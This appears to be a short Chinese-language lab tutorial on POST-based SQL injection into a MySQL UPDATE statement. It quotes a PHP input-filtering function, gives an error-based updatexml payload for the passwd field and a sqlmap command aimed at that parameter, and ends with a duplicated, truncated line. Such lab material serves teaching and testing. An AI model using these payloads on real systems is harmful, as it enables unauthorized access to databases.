POST Update 注入
1.Mysql update介绍
2.过滤内容介绍
function check_input($value)
{
if(!empty($value))
{
// truncation (see comments)
$value = substr($value,0,20);//获得下标从0到20的字符串
}
// Stripslashes if magic quotes enabled
if (get_magic_quotes_gpc())//判断是否存在反斜杠
{
$value = stripslashes($value);//去除字符串中的反斜杠
}
// Quote if not a number
if (!ctype_digit($value))//检验$value是否是纯数字
{
$value = "'" . mysql_real_escape_string($value) . "'";//函数转义SQL语句中使用的字符串中的特殊字符(\x00,\n,\r,\,',",\x1a)
}
else
{
$value = intval($value);//获取变量的整数值
}
return $value;
}
3.Mysql update注入
uname=admin&passwd=admin' or updatexml(1,concat(0x7e,version(),0x7e),1)#&submit=Submit
```
#是单行注释
```
4.Sqlmap安全测试
利用sqlmap读取target.txt中的内容并指定passwd参数进行SQL注入漏洞的利用
sqlmap - r target.txt -p passwd
asswd参数进行SQL注入漏洞的利用
sqlmap - r target.txt -p passwd